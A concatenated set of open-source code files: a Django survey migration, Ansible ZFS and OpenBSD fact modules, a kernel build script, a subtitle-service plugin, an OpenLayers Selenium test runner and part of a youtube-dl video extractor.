'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '8'}),
'survey_id': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'surveyuser': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['survey.SurveyUser']"})
},
'survey.localprofile': {
'Meta': {'object_name': 'LocalProfile'},
'a_family': ('django.db.models.fields.SmallIntegerField', [], {}),
'a_smoker': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'a_vaccine_current': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'a_vaccine_prev_seasonal': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'a_vaccine_prev_swine': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'birth_date': ('django.db.models.fields.DateField', [], {}),
'gender': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'region': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True'}),
'sq_date_first': ('django.db.models.fields.DateField', [], {'null': 'True'}),
'sq_date_last': ('django.db.models.fields.DateField', [], {'null': 'True'}),
'sq_num_season': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True'}),
'sq_num_total': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True'}),
'surveyuser': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['survey.SurveyUser']", 'unique': 'True'}),
'zip_code': ('django.db.models.fields.CharField', [], {'max_length': '5'})
},
'survey.localresponse': {
'Meta': {'object_name': 'LocalResponse'},
'answers': ('django.db.models.fields.TextField', [], {}),
'date': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'survey_id': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'user_id': ('django.db.models.fields.CharField', [], {'max_length': '36'})
},
'survey.participation': {
'Meta': {'object_name': 'Participation'},
'date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'epidb_id': ('django.db.models.fields.CharField', [], {'max_length': '36', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'previous_participation': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['survey.Participation']", 'null': 'True'}),
'previous_participation_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'survey': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['survey.Survey']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['survey.SurveyUser']"})
},
'survey.profile': {
'Meta': {'object_name': 'Profile'},
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'survey': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['survey.Survey']", 'null': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['survey.SurveyUser']", 'unique': 'True'}),
'valid': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'survey.profilesendqueue': {
'Meta': {'object_name': 'ProfileSendQueue'},
'answers': ('django.db.models.fields.TextField', [], {}),
'date': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['survey.SurveyUser']"}),
'survey_id': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'user_id': ('django.db.models.fields.CharField', [], {'max_length': '36'})
},
'survey.responsesendqueue': {
'Meta': {'object_name': 'ResponseSendQueue'},
'answers': ('django.db.models.fields.TextField', [], {}),
'date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'participation': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['survey.Participation']"}),
'survey_id': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'user_id': ('django.db.models.fields.CharField', [], {'max_length': '36'})
},
'survey.survey': {
'Meta': {'object_name': 'Survey'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'specification': ('django.db.models.fields.TextField', [], {}),
'survey_id': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'survey.surveyuser': {
'Meta': {'object_name': 'SurveyUser'},
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'global_id': ('django.db.models.fields.CharField', [], {'default': "'6ca0cede-2234-44f3-ae1a-cc5214559505'", 'unique': 'True', 'max_length': '36'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_participation': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['survey.Participation']", 'null': 'True'}),
'last_participation_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'})
}
}
complete_apps = ['survey']
|
agpl-3.0
|
grimmjow8/ansible
|
lib/ansible/modules/storage/zfs/zpool_facts.py
|
22
|
6675
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2016, Adam ล tevko <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'version': '1.0'}
DOCUMENTATION = '''
---
module: zpool_facts
short_description: Gather facts about ZFS pools.
description:
- Gather facts from ZFS pool properties.
version_added: "2.3"
author: Adam ล tevko (@xen0l)
options:
name:
description:
- ZFS pool name.
alias: [ "pool", "zpool" ]
type: str
required: false
parsable:
description:
- Specifies if property values should be displayed in machine
friendly format.
type: bool
default: False
required: false
properties:
description:
- Specifies which dataset properties should be queried in comma-separated format.
For more information about dataset properties, check zpool(1M) man page.
alias: [ "props" ]
type: str
default: all
required: false
'''
EXAMPLES = '''
# Gather facts about ZFS pool rpool
zpool_facts: pool=rpool
# Gather space usage about all imported ZFS pools
zpool_facts: properties='free,size'
debug: msg='ZFS pool {{ item.name }} has {{ item.free }} free space out of {{ item.size }}.'
with_items: '{{ ansible_zfs_pools }}'
'''
RETURN = '''
name:
description: ZFS pool name
returned: always
type: string
sample: rpool
parsable:
description: if parsable output should be provided in machine friendly format.
returned: if 'parsable' is set to True
type: boolean
sample: True
zfs_pools:
description: ZFS pool facts
returned: always
type: string
sample:
{
"allocated": "3.46G",
"altroot": "-",
"autoexpand": "off",
"autoreplace": "off",
"bootfs": "rpool/ROOT/openindiana",
"cachefile": "-",
"capacity": "6%",
"comment": "-",
"dedupditto": "0",
"dedupratio": "1.00x",
"delegation": "on",
"expandsize": "-",
"failmode": "wait",
"feature@async_destroy": "enabled",
"feature@bookmarks": "enabled",
"feature@edonr": "enabled",
"feature@embedded_data": "active",
"feature@empty_bpobj": "active",
"feature@enabled_txg": "active",
"feature@extensible_dataset": "enabled",
"feature@filesystem_limits": "enabled",
"feature@hole_birth": "active",
"feature@large_blocks": "enabled",
"feature@lz4_compress": "active",
"feature@multi_vdev_crash_dump": "enabled",
"feature@sha512": "enabled",
"feature@skein": "enabled",
"feature@spacemap_histogram": "active",
"fragmentation": "3%",
"free": "46.3G",
"freeing": "0",
"guid": "15729052870819522408",
"health": "ONLINE",
"leaked": "0",
"listsnapshots": "off",
"name": "rpool",
"readonly": "off",
"size": "49.8G",
"version": "-"
}
'''
import os
from collections import defaultdict
from ansible.module_utils.six import iteritems
from ansible.module_utils.basic import AnsibleModule
class ZPoolFacts(object):
def __init__(self, module):
self.module = module
self.name = module.params['name']
self.parsable = module.params['parsable']
self.properties = module.params['properties']
self._pools = defaultdict(dict)
self.facts = []
def pool_exists(self):
cmd = [self.module.get_bin_path('zpool')]
cmd.append('list')
cmd.append(self.name)
(rc, out, err) = self.module.run_command(cmd)
if rc == 0:
return True
else:
return False
def get_facts(self):
cmd = [self.module.get_bin_path('zpool')]
cmd.append('get')
cmd.append('-H')
if self.parsable:
cmd.append('-p')
cmd.append('-o')
cmd.append('name,property,value')
cmd.append(self.properties)
if self.name:
cmd.append(self.name)
(rc, out, err) = self.module.run_command(cmd)
if rc == 0:
for line in out.splitlines():
pool, property, value = line.split('\t')
self._pools[pool].update({property: value})
for k, v in iteritems(self._pools):
v.update({'name': k})
self.facts.append(v)
return {'ansible_zfs_pools': self.facts}
else:
self.module.fail_json(msg='Error while trying to get facts about ZFS pool: %s' % self.name,
stderr=err,
rc=rc)
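# Illustrative note (not part of the original module): with the default properties,
# the command built above is `zpool get -H -o name,property,value all [pool]`, whose
# tab-separated rows (e.g. "rpool<TAB>size<TAB>49.8G") get_facts() folds into
# {'rpool': {'size': '49.8G', ..., 'name': 'rpool'}} before appending to the facts list.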
def main():
module = AnsibleModule(
argument_spec=dict(
name=dict(required=False, aliases=['pool', 'zpool'], type='str'),
parsable=dict(required=False, default=False, type='bool'),
properties=dict(required=False, default='all', type='str'),
),
supports_check_mode=True
)
zpool_facts = ZPoolFacts(module)
result = {}
result['changed'] = False
result['name'] = zpool_facts.name
if zpool_facts.parsable:
result['parsable'] = zpool_facts.parsable
if zpool_facts.name is not None:
if zpool_facts.pool_exists():
result['ansible_facts'] = zpool_facts.get_facts()
else:
module.fail_json(msg='ZFS pool %s does not exist!' % zpool_facts.name)
else:
result['ansible_facts'] = zpool_facts.get_facts()
module.exit_json(**result)
if __name__ == '__main__':
main()
|
gpl-3.0
|
haad/ansible
|
lib/ansible/module_utils/facts/network/openbsd.py
|
232
|
1600
|
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.module_utils.facts.network.base import NetworkCollector
from ansible.module_utils.facts.network.generic_bsd import GenericBsdIfconfigNetwork
class OpenBSDNetwork(GenericBsdIfconfigNetwork):
"""
This is the OpenBSD Network Class.
It uses the GenericBsdIfconfigNetwork.
"""
platform = 'OpenBSD'
# OpenBSD 'ifconfig -a' does not have information about aliases
def get_interfaces_info(self, ifconfig_path, ifconfig_options='-aA'):
return super(OpenBSDNetwork, self).get_interfaces_info(ifconfig_path, ifconfig_options)
# Return macaddress instead of lladdr
def parse_lladdr_line(self, words, current_if, ips):
current_if['macaddress'] = words[1]
current_if['type'] = 'ether'
class OpenBSDNetworkCollector(NetworkCollector):
_fact_class = OpenBSDNetwork
_platform = 'OpenBSD'
|
gpl-3.0
|
Cl3Kener/UBER-L
|
scripts/build-all.py
|
305
|
10150
|
#! /usr/bin/env python
# Copyright (c) 2009-2013, The Linux Foundation. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of The Linux Foundation nor
# the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NON-INFRINGEMENT ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Build the kernel for all targets using the Android build environment.
#
# TODO: Accept arguments to indicate what to build.
import errno
import glob
from optparse import OptionParser
import subprocess
import os
import os.path
import re
import shutil
import sys
version = 'build-all.py, version 0.01'
build_dir = '../all-kernels'
make_command = ["vmlinux", "modules", "dtbs"]
make_env = os.environ
make_env.update({
'ARCH': 'arm',
'CROSS_COMPILE': 'arm-none-linux-gnueabi-',
'KCONFIG_NOTIMESTAMP': 'true' })
all_options = {}
def error(msg):
sys.stderr.write("error: %s\n" % msg)
def fail(msg):
"""Fail with a user-printed message"""
error(msg)
sys.exit(1)
def check_kernel():
"""Ensure that PWD is a kernel directory"""
if (not os.path.isfile('MAINTAINERS') or
not os.path.isfile('arch/arm/mach-msm/Kconfig')):
fail("This doesn't seem to be an MSM kernel dir")
def check_build():
"""Ensure that the build directory is present."""
if not os.path.isdir(build_dir):
try:
os.makedirs(build_dir)
except OSError as exc:
if exc.errno == errno.EEXIST:
pass
else:
raise
def update_config(file, str):
print 'Updating %s with \'%s\'\n' % (file, str)
defconfig = open(file, 'a')
defconfig.write(str + '\n')
defconfig.close()
def scan_configs():
"""Get the full list of defconfigs appropriate for this tree."""
names = {}
arch_pats = (
r'[fm]sm[0-9]*_defconfig',
r'apq*_defconfig',
r'qsd*_defconfig',
)
for p in arch_pats:
for n in glob.glob('arch/arm/configs/' + p):
names[os.path.basename(n)[:-10]] = n
return names
class Builder:
def __init__(self, logname):
self.logname = logname
self.fd = open(logname, 'w')
def run(self, args):
devnull = open('/dev/null', 'r')
proc = subprocess.Popen(args, stdin=devnull,
env=make_env,
bufsize=0,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
count = 0
# for line in proc.stdout:
rawfd = proc.stdout.fileno()
while True:
line = os.read(rawfd, 1024)
if not line:
break
self.fd.write(line)
self.fd.flush()
if all_options.verbose:
sys.stdout.write(line)
sys.stdout.flush()
else:
for i in range(line.count('\n')):
count += 1
if count == 64:
count = 0
print
sys.stdout.write('.')
sys.stdout.flush()
print
result = proc.wait()
self.fd.close()
return result
failed_targets = []
def build(target):
dest_dir = os.path.join(build_dir, target)
log_name = '%s/log-%s.log' % (build_dir, target)
print 'Building %s in %s log %s' % (target, dest_dir, log_name)
if not os.path.isdir(dest_dir):
os.mkdir(dest_dir)
defconfig = 'arch/arm/configs/%s_defconfig' % target
dotconfig = '%s/.config' % dest_dir
savedefconfig = '%s/defconfig' % dest_dir
shutil.copyfile(defconfig, dotconfig)
staging_dir = 'install_staging'
modi_dir = '%s' % staging_dir
hdri_dir = '%s/usr' % staging_dir
shutil.rmtree(os.path.join(dest_dir, staging_dir), ignore_errors=True)
devnull = open('/dev/null', 'r')
subprocess.check_call(['make', 'O=%s' % dest_dir,
'%s_defconfig' % target], env=make_env, stdin=devnull)
devnull.close()
if not all_options.updateconfigs:
# Build targets can be dependent upon the completion of previous
# build targets, so build them one at a time.
cmd_line = ['make',
'INSTALL_HDR_PATH=%s' % hdri_dir,
'INSTALL_MOD_PATH=%s' % modi_dir,
'O=%s' % dest_dir]
build_targets = []
for c in make_command:
if re.match(r'^-{1,2}\w', c):
cmd_line.append(c)
else:
build_targets.append(c)
for t in build_targets:
build = Builder(log_name)
result = build.run(cmd_line + [t])
if result != 0:
if all_options.keep_going:
failed_targets.append(target)
fail_or_error = error
else:
fail_or_error = fail
fail_or_error("Failed to build %s, see %s" %
(target, build.logname))
# Copy the defconfig back.
if all_options.configs or all_options.updateconfigs:
devnull = open('/dev/null', 'r')
subprocess.check_call(['make', 'O=%s' % dest_dir,
'savedefconfig'], env=make_env, stdin=devnull)
devnull.close()
shutil.copyfile(savedefconfig, defconfig)
def build_many(allconf, targets):
print "Building %d target(s)" % len(targets)
for target in targets:
if all_options.updateconfigs:
update_config(allconf[target], all_options.updateconfigs)
build(target)
if failed_targets:
fail('\n '.join(["Failed targets:"] +
[target for target in failed_targets]))
def main():
global make_command
check_kernel()
check_build()
configs = scan_configs()
usage = ("""
%prog [options] all -- Build all targets
%prog [options] target target ... -- List specific targets
%prog [options] perf -- Build all perf targets
%prog [options] noperf -- Build all non-perf targets""")
parser = OptionParser(usage=usage, version=version)
parser.add_option('--configs', action='store_true',
dest='configs',
help="Copy configs back into tree")
parser.add_option('--list', action='store_true',
dest='list',
help='List available targets')
parser.add_option('-v', '--verbose', action='store_true',
dest='verbose',
help='Output to stdout in addition to log file')
parser.add_option('--oldconfig', action='store_true',
dest='oldconfig',
help='Only process "make oldconfig"')
parser.add_option('--updateconfigs',
dest='updateconfigs',
help="Update defconfigs with provided option setting, "
"e.g. --updateconfigs=\'CONFIG_USE_THING=y\'")
parser.add_option('-j', '--jobs', type='int', dest="jobs",
help="Number of simultaneous jobs")
parser.add_option('-l', '--load-average', type='int',
dest='load_average',
help="Don't start multiple jobs unless load is below LOAD_AVERAGE")
parser.add_option('-k', '--keep-going', action='store_true',
dest='keep_going', default=False,
help="Keep building other targets if a target fails")
parser.add_option('-m', '--make-target', action='append',
help='Build the indicated make target (default: %s)' %
' '.join(make_command))
(options, args) = parser.parse_args()
global all_options
all_options = options
if options.list:
print "Available targets:"
for target in configs.keys():
print " %s" % target
sys.exit(0)
if options.oldconfig:
make_command = ["oldconfig"]
elif options.make_target:
make_command = options.make_target
if options.jobs:
make_command.append("-j%d" % options.jobs)
if options.load_average:
make_command.append("-l%d" % options.load_average)
if args == ['all']:
build_many(configs, configs.keys())
elif args == ['perf']:
targets = []
for t in configs.keys():
if "perf" in t:
targets.append(t)
build_many(configs, targets)
elif args == ['noperf']:
targets = []
for t in configs.keys():
if "perf" not in t:
targets.append(t)
build_many(configs, targets)
elif len(args) > 0:
targets = []
for t in args:
if t not in configs.keys():
parser.error("Target '%s' not one of %s" % (t, configs.keys()))
targets.append(t)
build_many(configs, targets)
else:
parser.error("Must specify a target to build, or 'all'")
if __name__ == "__main__":
main()
|
gpl-2.0
|
jordan8037310/CouchPotatoServer
|
libs/subliminal/services/subscenter.py
|
43
|
4387
|
# -*- coding: utf-8 -*-
# Copyright 2012 Ofir Brukner <[email protected]>
#
# This file is part of subliminal.
#
# subliminal is free software; you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# subliminal is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with subliminal. If not, see <http://www.gnu.org/licenses/>.
import logging
import re
import json
from . import ServiceBase
from ..exceptions import ServiceError
from ..language import language_set
from ..subtitles import get_subtitle_path, ResultSubtitle
from ..videos import Episode, Movie
from ..utils import to_unicode, get_keywords
logger = logging.getLogger(__name__)
class Subscenter(ServiceBase):
server_url = 'http://subscenter.cinemast.com/he/'
api_based = False
languages = language_set(['he', 'en'])
videos = [Episode, Movie]
require_video = False
required_features = ['permissive']
@staticmethod
def slugify(string):
new_string = string.replace(' ', '-').replace("'", '').replace(':', '').lower()
# We remove multiple spaces by using this regular expression.
return re.sub('-+', '-', new_string)
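    # Illustrative example (not part of the original service code) of what the
    # slugify transformation above produces:
    #   slugify("It's Always Sunny: In Philadelphia") -> 'its-always-sunny-in-philadelphia'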
def list_checked(self, video, languages):
series = None
season = None
episode = None
title = video.title
if isinstance(video, Episode):
series = video.series
season = video.season
episode = video.episode
return self.query(video.path or video.release, languages, get_keywords(video.guess), series, season,
episode, title)
def query(self, filepath, languages=None, keywords=None, series=None, season=None, episode=None, title=None):
        logger.debug(u'Getting subtitles for %s season %s episode %s with languages %r' % (series, season, episode, languages))
# Converts the title to Subscenter format by replacing whitespaces and removing specific chars.
if series and season and episode:
# Search for a TV show.
kind = 'episode'
slugified_series = self.slugify(series)
url = self.server_url + 'cinemast/data/series/sb/' + slugified_series + '/' + str(season) + '/' + \
str(episode) + '/'
elif title:
# Search for a movie.
kind = 'movie'
slugified_title = self.slugify(title)
url = self.server_url + 'cinemast/data/movie/sb/' + slugified_title + '/'
else:
raise ServiceError('One or more parameters are missing')
logger.debug('Searching subtitles %r', {'title': title, 'season': season, 'episode': episode})
response = self.session.get(url)
if response.status_code != 200:
raise ServiceError('Request failed with status code %d' % response.status_code)
subtitles = []
response_json = json.loads(response.content)
for lang, lang_json in response_json.items():
lang_obj = self.get_language(lang)
if lang_obj in self.languages and lang_obj in languages:
for group_data in lang_json.values():
for quality in group_data.values():
for sub in quality.values():
release = sub.get('subtitle_version')
sub_path = get_subtitle_path(filepath, lang_obj, self.config.multi)
link = self.server_url + 'subtitle/download/' + lang + '/' + str(sub.get('id')) + \
'/?v=' + release + '&key=' + str(sub.get('key'))
subtitles.append(ResultSubtitle(sub_path, lang_obj, self.__class__.__name__.lower(),
link, release=to_unicode(release)))
return subtitles
def download(self, subtitle):
self.download_zip_file(subtitle.link, subtitle.path)
return subtitle
Service = Subscenter
|
gpl-3.0
|
ARPASMR/IRIS_lombardia
|
html/OpenLayers-2.13.1/tests/selenium/remotecontrol/test_ol.py
|
254
|
2873
|
from selenium import selenium
import time
import sys
from ConfigParser import ConfigParser
MAX_TEST_LENGTH = 300
if len(sys.argv) > 2:
filename = sys.argv[2]
else:
filename = "config.cfg"
c = ConfigParser()
c.read(filename)
targets = {}
server = c.get('config', 'server')
url= c.get('config', 'url')
if c.has_option('config', 'timeout'):
MAX_TEST_LENGTH = int(c.get('config', 'timeout'))
sections = c.sections()
for s in sections:
if s == 'config':
continue
targets[s] = dict(c.items(s))
targets[s]['name'] = s
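# Illustrative config.cfg sketch (section names and values below are invented;
# only the keys read above -- server, url, timeout, host, browsercmd -- come
# from this script):
#
#   [config]
#   server = http://localhost/
#   url = http://localhost/openlayers/tests/run-tests.html
#   timeout = 300
#
#   [firefox-linux]
#   host = 127.0.0.1
#   browsercmd = firefox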
if sys.argv[1] == "all":
browsers = list(targets.values())
elif sys.argv[1] not in targets:
print "Invalid target"
sys.exit()
else:
browsers = [targets[sys.argv[1]]]
keep_going = True
if 1:
for b in browsers:
if not keep_going:
continue
print "Running %s on %s" % (b['name'], b['host'])
s = selenium(b['host'], 4444, "*%s" % b['browsercmd'], server)
s.start()
try:
s.open_window(url, "test_running")
time.sleep(2)
s.select_window("test_running")
time.sleep(2)
s.refresh()
count = 0
while count == 0:
count = int(s.get_eval("window.document.getElementById('testtable').getElementsByTagName('tr').length"))
time.sleep(5)
ok = 0
fail = 0
last_change = time.time()
while True:
new_ok = int(s.get_eval('window.Test.AnotherWay._g_ok_pages'))
new_fail = int(s.get_eval('window.Test.AnotherWay._g_fail_pages'))
if new_ok != ok or new_fail != fail:
ok = new_ok
fail = new_fail
last_change = time.time()
if (ok + fail) >= count:
break
if time.time() - last_change > MAX_TEST_LENGTH:
raise Exception("Failed: with %s okay and %s failed, ran out of time: %s is more than %s" % (ok, fail, (time.time() - last_change), MAX_TEST_LENGTH))
time.sleep(10)
if fail:
print "Failed: %s" % fail
html = s.get_eval("window.document.getElementById('results').innerHTML").encode("utf-8")
all_html = """<html>
<head>
<meta content="text/html; charset=utf-8" http-equiv="content-type" />
</head>
<body>%s</body></html>""" % html
f = open("fail.%s.%s.html" % (time.time(), b['name']), "w")
f.write(all_html)
f.close()
except KeyboardInterrupt, E:
keep_going = False
print "Stopped by keyboard interrupt"
except Exception, E:
print "Error: ", E
s.stop()
|
gpl-3.0
|
remitamine/youtube-dl
|
youtube_dl/extractor/frontendmasters.py
|
14
|
8807
|
# coding: utf-8
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..compat import (
compat_str,
compat_urlparse,
)
from ..utils import (
ExtractorError,
parse_duration,
url_or_none,
urlencode_postdata,
)
class FrontendMastersBaseIE(InfoExtractor):
_API_BASE = 'https://api.frontendmasters.com/v1/kabuki'
_LOGIN_URL = 'https://frontendmasters.com/login/'
_NETRC_MACHINE = 'frontendmasters'
_QUALITIES = {
'low': {'width': 480, 'height': 360},
'mid': {'width': 1280, 'height': 720},
'high': {'width': 1920, 'height': 1080}
}
def _real_initialize(self):
self._login()
def _login(self):
(username, password) = self._get_login_info()
if username is None:
return
login_page = self._download_webpage(
self._LOGIN_URL, None, 'Downloading login page')
login_form = self._hidden_inputs(login_page)
login_form.update({
'username': username,
'password': password
})
post_url = self._search_regex(
r'<form[^>]+action=(["\'])(?P<url>.+?)\1', login_page,
'post_url', default=self._LOGIN_URL, group='url')
if not post_url.startswith('http'):
post_url = compat_urlparse.urljoin(self._LOGIN_URL, post_url)
response = self._download_webpage(
post_url, None, 'Logging in', data=urlencode_postdata(login_form),
headers={'Content-Type': 'application/x-www-form-urlencoded'})
# Successful login
if any(p in response for p in (
'wp-login.php?action=logout', '>Logout')):
return
error = self._html_search_regex(
r'class=(["\'])(?:(?!\1).)*\bMessageAlert\b(?:(?!\1).)*\1[^>]*>(?P<error>[^<]+)<',
response, 'error message', default=None, group='error')
if error:
raise ExtractorError('Unable to login: %s' % error, expected=True)
raise ExtractorError('Unable to log in')
class FrontendMastersPageBaseIE(FrontendMastersBaseIE):
def _download_course(self, course_name, url):
return self._download_json(
'%s/courses/%s' % (self._API_BASE, course_name), course_name,
'Downloading course JSON', headers={'Referer': url})
@staticmethod
def _extract_chapters(course):
chapters = []
lesson_elements = course.get('lessonElements')
if isinstance(lesson_elements, list):
chapters = [url_or_none(e) for e in lesson_elements if url_or_none(e)]
return chapters
@staticmethod
def _extract_lesson(chapters, lesson_id, lesson):
title = lesson.get('title') or lesson_id
display_id = lesson.get('slug')
description = lesson.get('description')
thumbnail = lesson.get('thumbnail')
chapter_number = None
index = lesson.get('index')
element_index = lesson.get('elementIndex')
if (isinstance(index, int) and isinstance(element_index, int)
and index < element_index):
chapter_number = element_index - index
chapter = (chapters[chapter_number - 1]
if chapter_number - 1 < len(chapters) else None)
duration = None
timestamp = lesson.get('timestamp')
if isinstance(timestamp, compat_str):
mobj = re.search(
r'(?P<start>\d{1,2}:\d{1,2}:\d{1,2})\s*-(?P<end>\s*\d{1,2}:\d{1,2}:\d{1,2})',
timestamp)
if mobj:
duration = parse_duration(mobj.group('end')) - parse_duration(
mobj.group('start'))
return {
'_type': 'url_transparent',
'url': 'frontendmasters:%s' % lesson_id,
'ie_key': FrontendMastersIE.ie_key(),
'id': lesson_id,
'display_id': display_id,
'title': title,
'description': description,
'thumbnail': thumbnail,
'duration': duration,
'chapter': chapter,
'chapter_number': chapter_number,
}
class FrontendMastersIE(FrontendMastersBaseIE):
_VALID_URL = r'(?:frontendmasters:|https?://api\.frontendmasters\.com/v\d+/kabuki/video/)(?P<id>[^/]+)'
_TESTS = [{
'url': 'https://api.frontendmasters.com/v1/kabuki/video/a2qogef6ba',
'md5': '7f161159710d6b7016a4f4af6fcb05e2',
'info_dict': {
'id': 'a2qogef6ba',
'ext': 'mp4',
'title': 'a2qogef6ba',
},
'skip': 'Requires FrontendMasters account credentials',
}, {
'url': 'frontendmasters:a2qogef6ba',
'only_matching': True,
}]
def _real_extract(self, url):
lesson_id = self._match_id(url)
source_url = '%s/video/%s/source' % (self._API_BASE, lesson_id)
formats = []
for ext in ('webm', 'mp4'):
for quality in ('low', 'mid', 'high'):
resolution = self._QUALITIES[quality].copy()
format_id = '%s-%s' % (ext, quality)
format_url = self._download_json(
source_url, lesson_id,
'Downloading %s source JSON' % format_id, query={
'f': ext,
'r': resolution['height'],
}, headers={
'Referer': url,
}, fatal=False)['url']
if not format_url:
continue
f = resolution.copy()
f.update({
'url': format_url,
'ext': ext,
'format_id': format_id,
})
formats.append(f)
self._sort_formats(formats)
subtitles = {
'en': [{
'url': '%s/transcripts/%s.vtt' % (self._API_BASE, lesson_id),
}]
}
return {
'id': lesson_id,
'title': lesson_id,
'formats': formats,
'subtitles': subtitles
}
class FrontendMastersLessonIE(FrontendMastersPageBaseIE):
_VALID_URL = r'https?://(?:www\.)?frontendmasters\.com/courses/(?P<course_name>[^/]+)/(?P<lesson_name>[^/]+)'
_TEST = {
'url': 'https://frontendmasters.com/courses/web-development/tools',
'info_dict': {
'id': 'a2qogef6ba',
'display_id': 'tools',
'ext': 'mp4',
'title': 'Tools',
'description': 'md5:82c1ea6472e88ed5acd1829fe992e4f7',
